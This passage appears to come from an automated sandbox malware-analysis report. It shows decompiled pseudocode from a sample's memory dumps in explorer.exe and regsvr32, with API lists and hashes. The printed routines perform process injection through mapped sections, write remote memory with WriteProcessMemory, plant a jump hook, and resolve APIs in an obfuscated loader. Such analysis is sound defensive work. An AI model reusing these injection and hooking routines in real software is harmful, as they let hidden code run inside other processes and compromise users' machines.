                                          						_v12 =  *_v32 & 0xfff;
                                          						_v40 = (_v12 & 0x0000ffff) + _v80;
                                          						if((_v5 & 0x000000ff) != 3) {
                                          							if((_v5 & 0x000000ff) == 0xa) {
                                          								 *_v40 =  *_v40 + _v56;
                                          							}
                                          						} else {
                                          							 *_v40 =  *_v40 + _v56;
                                          						}
                                          						_v32 =  &(_v32[1]);
                                          					}
                                          					_v44 = _v32;
                                          				}
                                          				goto L13;
                                          			}






























                                          APIs
                                          • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                                          • LoadLibraryA.KERNEL32(?), ref: 00092C65
                                          • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 384173800-0
                                          • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                                          • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                                          • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                                          • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _t13;
                                          				intOrPtr _t15;
                                          				signed int _t16;
                                          				intOrPtr _t17;
                                          				signed int _t18;
                                          				char _t20;
                                          				intOrPtr _t22;
                                          				void* _t23;
                                          				void* _t24;
                                          				intOrPtr _t29;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t43;
                                          				intOrPtr _t48;
                                          				void* _t51;
                                          				signed int _t61;
                                          				signed int _t64;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t61 = __ecx;
                                          				_t41 =  *0x9e6dc; // 0x1d8
                                          				_t13 = E0008A4BF(_t41, 0);
                                          				while(_t13 < 0) {
                                          					E0008980C( &_v28);
                                          					_t43 =  *0x9e6e0; // 0x0
                                          					_t15 =  *0x9e6e4; // 0x0
                                          					_t41 = _t43 + 0xe10;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t15 - _v24;
                                          					if(__eflags > 0) {
                                          						L9:
                                          						_t16 = 0xfffffffe;
                                          						L13:
                                          						return _t16;
                                          					}
                                          					if(__eflags < 0) {
                                          						L4:
                                          						_t17 =  *0x9e684; // 0x34f8f0
                                          						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
                                          						__eflags = _t18;
                                          						if(_t18 == 0) {
                                          							break;
                                          						}
                                          						_t35 =  *0x9e684; // 0x34f8f0
                                          						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                          						_t41 =  *0x9e6dc; // 0x1d8
                                          						__eflags = 0;
                                          						_t13 = E0008A4BF(_t41, 0);
                                          						continue;
                                          					}
                                          					__eflags = _t41 - _v28;
                                          					if(_t41 >= _v28) {
                                          						goto L9;
                                          					}
                                          					goto L4;
                                          				}
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t20 =  *0x9e6e8; // 0x34ffd0
                                          				_v28 = _t20;
                                          				_t22 = E0008A6A9(_t41, _t61,  &_v16);
                                          				_v20 = _t22;
                                          				if(_t22 != 0) {
                                          					_t23 = GetCurrentProcess();
                                          					_t24 = GetCurrentThread();
                                          					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
                                          					E0008980C(0x9e6e0);
                                          					_t64 = E00081A1B( &_v28, E00081226, _t71);
                                          					__eflags = _t64;
                                          					if(_t64 >= 0) {
                                          						_push(0);
                                          						_push( *0x9e760);
                                          						_t51 = 0x27;
                                          						E00089F06(_t51);
                                          					}
                                          				} else {
                                          					_t64 = _t61 | 0xffffffff;
                                          				}
                                          				_t29 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
                                          				_t48 =  *0x9e6dc; // 0x1d8
                                          				 *0x9e6d0 = 0;
                                          				E0008A4DB(_t48);
                                          				E0008861A( &_v24, 0);
                                          				_t16 = _t64;
                                          				goto L13;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5440ee2a19d37476f6d76c6c202a165a4a6b38181fe6b17b305cff97d8016c0a
                                          • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                                          • Opcode Fuzzy Hash: 5440ee2a19d37476f6d76c6c202a165a4a6b38181fe6b17b305cff97d8016c0a
                                          • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E00081B2D(void* __eflags, void* __fp0) {
                                          				char _v24;
                                          				char _v28;
                                          				void* _t12;
                                          				intOrPtr _t14;
                                          				void* _t15;
                                          				intOrPtr _t16;
                                          				void* _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				char _t24;
                                          				intOrPtr _t26;
                                          				intOrPtr _t28;
                                          				intOrPtr _t33;
                                          				intOrPtr _t38;
                                          				intOrPtr _t40;
                                          				void* _t41;
                                          				intOrPtr _t46;
                                          				void* _t48;
                                          				intOrPtr _t51;
                                          				void* _t61;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t38 =  *0x9e6f4; // 0x1d4
                                          				_t12 = E0008A4BF(_t38, 0);
                                          				while(_t12 < 0) {
                                          					E0008980C( &_v28);
                                          					_t40 =  *0x9e700; // 0x0
                                          					_t14 =  *0x9e704; // 0x0
                                          					_t41 = _t40 + 0x3840;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t14 - _v24;
                                          					if(__eflags > 0) {
                                          						L13:
                                          						_t15 = 0;
                                          					} else {
                                          						if(__eflags < 0) {
                                          							L4:
                                          							_t16 =  *0x9e684; // 0x34f8f0
                                          							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
                                          							__eflags = _t17;
                                          							if(_t17 == 0) {
                                          								break;
                                          							} else {
                                          								_t33 =  *0x9e684; // 0x34f8f0
                                          								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                          								_t51 =  *0x9e6f4; // 0x1d4
                                          								__eflags = 0;
                                          								_t12 = E0008A4BF(_t51, 0);
                                          								continue;
                                          							}
                                          						} else {
                                          							__eflags = _t41 - _v28;
                                          							if(_t41 >= _v28) {
                                          								goto L13;
                                          							} else {
                                          								goto L4;
                                          							}
                                          						}
                                          					}
                                          					L12:
                                          					return _t15;
                                          				}
                                          				E0008980C(0x9e700);
                                          				_t19 = GetCurrentProcess();
                                          				_t20 = GetCurrentThread();
                                          				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t24 =  *0x9e6e8; // 0x34ffd0
                                          				_v28 = _t24;
                                          				_t61 = E00081A1B( &_v28, E0008131E, _t71);
                                          				if(_t61 >= 0) {
                                          					_push(0);
                                          					_push( *0x9e760);
                                          					_t48 = 0x27;
                                          					E00089F06(_t48);
                                          				}
                                          				if(_v24 != 0) {
                                          					E00086890( &_v24);
                                          				}
                                          				_t26 =  *0x9e684; // 0x34f8f0
                                          				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
                                          				_t28 =  *0x9e758; // 0x0
                                          				 *0x9e6ec = 0;
                                          				_t29 =  !=  ? 1 : _t28;
                                          				_t46 =  *0x9e6f4; // 0x1d4
                                          				 *0x9e758 =  !=  ? 1 : _t28;
                                          				E0008A4DB(_t46);
                                          				_t15 = _t61;
                                          				goto L12;
                                          			}


                                          APIs
                                          • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                                          • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                                          • DuplicateHandle.KERNEL32 ref: 00081BD9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Current$Process$DuplicateHandleThread
                                          • String ID:
                                          • API String ID: 3566409357-0
                                          • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                                          • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                                          • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                                          • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 86%
                                          			E1000C6C0(void* __ecx, intOrPtr __edx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				long _v24;
                                          				long _v28;
                                          				void* _v32;
                                          				intOrPtr _v36;
                                          				long _v40;
                                          				void* _v44;
                                          				char _v56;
                                          				char _v72;
                                          				struct _WNDCLASSEXA _v120;
                                          				void* _t69;
                                          				intOrPtr _t75;
                                          				struct HWND__* _t106;
                                          				intOrPtr* _t113;
                                          				struct _EXCEPTION_RECORD _t116;
                                          				void* _t126;
                                          				void* _t131;
                                          				intOrPtr _t134;
                                          				void* _t140;
                                          				void* _t141;
                                          
                                          				_t69 =  *0x1001e688; // 0x1820590
                                          				_t126 = __ecx;
                                          				_t134 = __edx;
                                          				_t116 = 0;
                                          				_v36 = __edx;
                                          				_v16 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				_v12 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v20 = __ecx;
                                          				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                          					E1000E23E(0x1f4);
                                          					_t116 = 0;
                                          				}
                                          				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                          				_v28 = _t116;
                                          				if( *_t113 != 0x4550) {
                                          					L12:
                                          					if(_v8 != 0) {
                                          						_t75 =  *0x1001e780; // 0x189fbc8
                                          						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                          						_v8 = _v8 & 0x00000000;
                                          					}
                                          					L14:
                                          					if(_v12 != 0) {
                                          						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                                          					}
                                          					if(_v16 != 0) {
                                          						NtClose(_v16);
                                          					}
                                          					return _v8;
                                          				}
                                          				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                          				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                                          					goto L12;
                                          				}
                                          				_v120.style = 0xb;
                                          				_v120.cbSize = 0x30;
                                          				_v120.lpszClassName =  &_v56;
                                          				asm("movsd");
                                          				_v120.lpfnWndProc = DefWindowProcA;
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsb");
                                          				asm("movsd");
                                          				asm("movsd");
                                          				asm("movsw");
                                          				asm("movsb");
                                          				_v120.cbWndExtra = 0;
                                          				_v120.lpszMenuName = 0;
                                          				_v120.cbClsExtra = 0;
                                          				_v120.hInstance = 0;
                                          				if(RegisterClassExA( &_v120) != 0) {
                                          					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
                                          					if(_t106 != 0) {
                                          						DestroyWindow(_t106); // executed
                                          						UnregisterClassA( &_v56, 0);
                                          					}
                                          				}
                                          				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                          					_t126 = _v20;
                                          					goto L12;
                                          				} else {
                                          					_t126 = _v20;
                                          					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                          						goto L12;
                                          					}
                                          					_t140 = E10008669( *0x1001e688, 0x1ac4);
                                          					_v32 = _t140;
                                          					if(_t140 == 0) {
                                          						goto L12;
                                          					}
                                          					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                          					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                                          					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                          					E1000861A( &_v32, 0x1ac4);
                                          					_t141 =  *0x1001e688; // 0x1820590
                                          					 *0x1001e688 = _t131;
                                          					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                          					E1000C63F(_v12, _v8, _v36);
                                          					 *0x1001e688 = _t141;
                                          					goto L14;
                                          				}
                                          			}

                                          APIs
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                          • RegisterClassExA.USER32 ref: 1000C785
                                          • CreateWindowExA.USER32 ref: 1000C7B0
                                          • DestroyWindow.USER32 ref: 1000C7BB
                                          • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                                          • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                                          • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                                          • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                                            • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                          • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                                          • NtClose.NTDLL(00000000), ref: 1000C8F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                                          • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                          • API String ID: 2002808388-2319545179
                                          • Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                                          • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                                          • Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                                          • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Control-flow graph 167, entry block 1000cb77-1000cb90; labeled nodes: call 1000c4ce, call 1000c6c0, memset, NtProtectVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory, FreeLibrary, call 1000861a]
                                          C-Code - Quality: 93%
                                          			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                          				long _v8;
                                          				long _v12;
                                          				void* _v16;
                                          				intOrPtr _v23;
                                          				void _v24;
                                          				long _v28;
                                          				void* _v568;
                                          				void _v744;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				struct HINSTANCE__* _t32;
                                          				intOrPtr _t33;
                                          				intOrPtr _t35;
                                          				void* _t39;
                                          				intOrPtr _t43;
                                          				void* _t63;
                                          				long _t65;
                                          				void* _t70;
                                          				void** _t73;
                                          				void* _t74;
                                          
                                          				_t73 = __edx;
                                          				_t63 = __ecx;
                                          				_t74 = 0;
                                          				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
                                          					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
                                          					_t74 = _t39;
                                          					if(_t74 != 0) {
                                          						memset( &_v744, 0, 0x2cc);
                                          						_v744 = 0x10002;
                                          						_push( &_v744);
                                          						_t43 =  *0x1001e684; // 0x189faa0
                                          						_push(_t73[1]);
                                          						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
                                          							_t70 = _v568;
                                          							_v12 = _v12 & 0x00000000;
                                          							_v24 = 0xe9;
                                          							_t65 = 5;
                                          							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                                          							_v8 = _t65;
                                          							_v16 = _t70;
                                          							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
                                          								L6:
                                          								_t74 = 0;
                                          							} else {
                                          								_v28 = _v28 & 0x00000000;
                                          								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                          									goto L6;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t32 =  *0x1001e77c; // 0x0
                                          				if(_t32 != 0) {
                                          					FreeLibrary(_t32);
                                          					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                                          				}
                                          				_t33 =  *0x1001e784; // 0x0
                                          				if(_t33 != 0) {
                                          					_t35 =  *0x1001e684; // 0x189faa0
                                          					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                                          					E1000861A(0x1001e784, 0xfffffffe);
                                          				}
                                          				return _t74;
                                          			}

                                          APIs
                                            • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                                            • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                            • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                            • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                                            • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                                            • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                                            • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                          • memset.MSVCRT ref: 1000CBB8
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                          • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                          • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                                          • String ID:
                                          • API String ID: 317994034-0
                                          • Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                                          • Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
                                          • Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
                                          • Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Control-flow graph 236, entry block 1a2c41-1a2c4e; labeled nodes: LoadLibraryA, OleUninitialize, OleInitialize]
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                                          • Instruction ID: 5507ae4f2530486994ed275ff5080ea4078c6f58f5deea31f6714d97a6099b85
                                          • Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
                                          • Instruction Fuzzy Hash: 6F426B72D00609DFEF04CFA0C9897AA7BB5FF64311F18546AED0DAE149C77815A4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Control-flow graph 361, entry block 1a3073-1a309b; labeled nodes: LoadLibraryA, OleUninitialize, OleInitialize]
                                          APIs
                                          • LoadLibraryA.KERNEL32(001A2C25,001A2C25,458F0000,?,00000000), ref: 001A31F1
                                          • OleUninitialize.OLE32(001A2C25), ref: 001A3354
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd
                                          Similarity
                                          • API ID: LibraryLoadUninitialize
                                          • String ID:
                                          • API String ID: 2978721001-0
                                          • Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                                          • Instruction ID: 4dd41452a046a952763c60044ab2daf1958aed4768b9ebc3df833331e043f03e
                                          • Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
                                          • Instruction Fuzzy Hash: 25D16B72D00615DFEF04CFA0C9897AABBB5FF54311F08546AED49AF149C73816A4CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          [Control-flow graph 479, entry block 1a1424-1a1431; labeled nodes: call 1a463b, VirtualAlloc, VirtualProtect, call 1a3726, call 1a4495, call 1a242a, call 1a3658]
                                          C-Code - Quality: 50%
                                          			E001A1424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
                                          				void* _t154;
                                          				int _t155;
                                          				signed int _t158;
                                          				int _t159;
                                          				signed int _t160;
                                          				intOrPtr _t163;
                                          				signed int _t164;
                                          				signed int _t166;
                                          				signed int _t169;
                                          				signed int _t171;
                                          				intOrPtr _t175;
                                          				signed int _t176;
                                          				intOrPtr _t177;
                                          				signed int _t179;
                                          				signed int _t182;
                                          				signed int _t183;
                                          				signed int _t185;
                                          				signed int _t188;
                                          				signed int _t189;
                                          				signed int _t190;
                                          				void* _t192;
                                          				signed int _t193;
                                          				signed int _t194;
                                          				signed int _t212;
                                          				signed int _t215;
                                          				signed int _t224;
                                          				signed int _t225;
                                          				void* _t226;
                                          				void* _t227;
                                          				signed int _t234;
                                          				signed int _t237;
                                          				void* _t244;
                                          				signed int* _t246;
                                          
                                          				_t234 = __esi;
                                          				_t224 = __edi;
                                          				_t212 = __edx;
                                          				_t155 = E001A463B(_t154, __ebx, __ecx, __edi);
                                          				_push(__ecx);
                                          				_t188 = __ebx | __ebx;
                                          				_t185 = _t188;
                                          				_pop(_t189);
                                          				if(_t188 != 0) {
                                          					if( *(_t185 + 0x4358a4) == 0) {
                                          						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
                                          						 *_t246 = _t189;
                                          						 *(_t185 + 0x4358a4) = 0 ^ _t183;
                                          						_t189 = 0;
                                          					}
                                          					_push(4);
                                          					_push(0x1000);
                                          					_push( *((intOrPtr*)(_t185 + 0x435280)));
                                          					_push(0);
                                          					if( *(_t185 + 0x435585) == 0) {
                                          						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
                                          						 *(_t244 - 8) = _t212;
                                          						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
                                          						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
                                          						_t212 =  *(_t244 - 8);
                                          					}
                                          					_t155 = VirtualAlloc();
                                          				}
                                          				 *_t17 = _t155;
                                          				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
                                          				if( *(_t185 + 0x435014) == 0) {
                                          					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
                                          					 *(_t244 - 4) = _t224;
                                          					 *(_t185 + 0x435014) = 0 ^ _t179;
                                          					_t224 =  *(_t244 - 4);
                                          					_t155 = (_t179 & 0x00000000) +  *_t246;
                                          					_t246 =  &(_t246[1]);
                                          				}
                                          				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
                                          				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
                                          				_t237 = _t234;
                                          				if( *(_t185 + 0x4350b0) > 0) {
                                          					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
                                          						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
                                          						 *(_t244 - 8) = _t237;
                                          						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
                                          						_t237 =  *(_t244 - 8);
                                          					}
                                          					_push(_t185 + 0x4354d2);
                                          					_push(0x40);
                                          					if( *(_t185 + 0x435968) == 0) {
                                          						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
                                          						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
                                          						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
                                          						_t189 = _t189;
                                          					}
                                          					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
                                          					 *_t246 = _t189;
                                          					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
                                          					_t189 = 0;
                                          					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
                                          				}
                                          				if(_t155 != _t185) {
                                          					if( *(_t185 + 0x435366) == 0) {
                                          						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
                                          						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
                                          						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
                                          						_t224 = _t224;
                                          					}
                                          					_push( *((intOrPtr*)(_t185 + 0x43574e)));
                                          					_push( *((intOrPtr*)(_t185 + 0x435288)));
                                          					if( *(_t185 + 0x435248) == 0) {
                                          						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
                                          						 *(_t244 - 8) = _t212;
                                          						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
                                          						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
                                          						_t212 =  *(_t244 - 8);
                                          					}
                                          					_t155 = E001A3726(_t185, _t189, _t212, _t224, _t237); // executed
                                          				}
                                          				 *(_t244 - 4) = _t212;
                                          				_t190 = 0 ^  *(_t185 + 0x435462);
                                          				_t215 =  *(_t244 - 4);
                                          				 *(_t244 - 8) = _t155;
                                          				_t225 = 0 ^  *(_t185 + 0x4350b0);
                                          				_t158 =  *(_t244 - 8);
                                          				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
                                          					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
                                          					 *_t79 = _t158;
                                          					_push( *(_t244 - 8));
                                          					_pop( *_t81);
                                          					 *_t82 = _t190;
                                          					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
                                          				}
                                          				_t192 = _t225 | _t225;
                                          				_t226 = _t192;
                                          				_t193 = _t190;
                                          				if(_t192 != 0) {
                                          					if( *(_t185 + 0x435520) == 0) {
